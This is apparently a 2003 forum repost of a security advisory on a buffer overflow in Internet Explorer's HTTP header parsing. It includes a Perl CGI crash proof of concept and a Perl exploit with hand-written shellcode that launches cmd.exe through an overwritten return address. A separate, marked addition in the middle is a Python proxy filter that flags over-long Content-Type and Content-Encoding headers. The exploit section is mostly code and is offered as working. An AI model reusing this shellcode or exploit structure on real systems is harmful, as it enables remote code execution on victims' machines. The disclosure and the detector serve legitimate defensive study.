admin
07-04-2003, 12:38 PM
As we reported in our previous article, Buffer Overflow in Internet Explorer's HTTP Parsing Code, a buffer overflow vulnerability allows remote attackers to cause the browser to execute arbitrary code. The following is a more technical explanation of the issue and exploit code for the mentioned vulnerability.
==============================================
The buffer overflow happens when a program using the vulnerable DLL (Internet Explorer, Outlook, possibly others) receives an HTTP reply which has excessively long values in both "Content-type" and "Content-encoding" fields.
By exploiting this vulnerability, an attacker can run arbitrary code on a victim's computer when a malicious web page or an HTML mail message is viewed. Starting up Outlook may be enough to trigger the exploit, since the program may open a preview of the first new message on startup.
No scripting, ActiveX, or even an IFRAME is needed - an IMG tag is enough. For this reason Security Zone settings have no effect on this flaw. For some reason an IMG tag seems in fact to be required in order to produce an exploitable buffer overflow. If the malicious HTTP reply comes with a normal HTML document, Internet Explorer hangs or just exits without any comment.
If the requirements are met (both header fields containing correctly sized values, IMG tag used), the issue reduces to a trivial stack-based buffer overflow. The return address is overwritten by the "Content-encoding" value. An appropriate length for the values seems to be about 300 bytes.
Sample:
To reproduce the buffer overflow, these files can be used:
CGI:
#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
#
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
HTML:
<html>
<body>
<img src="urlmon-bo.cgi">
</body>
</html>
If you view the HTML file with Internet Explorer on a vulnerable system, the program will crash with EIP=0x41414141 (this at least happened on various test systems). The actual exploit is left as an exercise.
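An added defender-side check, not part of the advisory: a small Python filter (for a proxy or mail gateway) that parses an HTTP reply's headers and flags the pattern the CGI above produces, over-long Content-Type and Content-Encoding values and a Content-Encoding that is not a known coding. The 128-byte limit and the list of accepted codings are assumed policy values, and the sample responses are constructed, not captured traffic.

```python
import re

# Assumed policy limit: the advisory's trigger is about 300 bytes per value,
# so 128 leaves room for legitimate media types with parameters.
MAX_VALUE_LEN = 128
WATCHED = ("content-type", "content-encoding")
# Assumed allow-list of content codings; extend it for your environment.
KNOWN_ENCODINGS = {"identity", "gzip", "x-gzip", "deflate", "compress", "x-compress", "br"}


def parse_headers(raw: bytes):
    """Split a raw HTTP response into (status line, [(name, value), ...]).
    Header names are lower-cased; folded continuation lines are joined."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        if line[:1] in (b" ", b"\t") and headers:  # obsolete line folding
            name, val = headers[-1]
            headers[-1] = (name, val + b" " + line.strip())
            continue
        name, _, val = line.partition(b":")
        headers.append((name.strip().lower().decode("latin-1"), val.strip()))
    return lines[0], headers


def audit_response(raw: bytes, max_len: int = MAX_VALUE_LEN):
    """Return a list of human-readable findings; empty means the reply passed."""
    findings = []
    _, headers = parse_headers(raw)
    for name, value in headers:
        if name in WATCHED and len(value) > max_len:
            findings.append(f"{name}: value is {len(value)} bytes (limit {max_len})")
        if name == "content-encoding":
            codings = {c.strip().lower() for c in value.decode("latin-1").split(",")}
            unknown = sorted(codings - KNOWN_ENCODINGS)
            if unknown:
                findings.append(f"content-encoding: unknown coding(s) {unknown}")
    return findings


# Constructed samples: a benign image reply and one shaped like urlmon-bo.cgi's output.
BENIGN = (b"HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\n"
          b"Content-Encoding: gzip\r\nContent-Length: 0\r\n\r\n")
TRIGGER = (b"HTTP/1.1 200 OK\r\nContent-type: " + b"A" * 300 + b"\r\n"
           b"Content-encoding: " + b"A" * 300 + b"\r\n\r\n")

if __name__ == "__main__":
    for label, resp in (("benign", BENIGN), ("trigger", TRIGGER)):
        print(label, audit_response(resp) or "ok")
```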
Exploit:
SecurITeam Experts have prepared working exploit code for the vulnerability; the exploit simply causes a cmd.exe window to pop up:
#!/usr/bin/perl
#
# SecurITeam Experts
# Based upon urlmon-bo.cgi by Jouko Pynnönen
#
$shellcode = join ("",
"\x90", # - NOP
# "\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # - SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);
# $eip = "\x41\xDD\x6C\x03"; # Sometimes this works
$eip = "\x41\xDD\xE9\x02"; # Sometimes this works (this worked more times than the previous one : ) )
$LONG=join ("", "A"x(300-length($shellcode)), $shellcode, $eip);
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";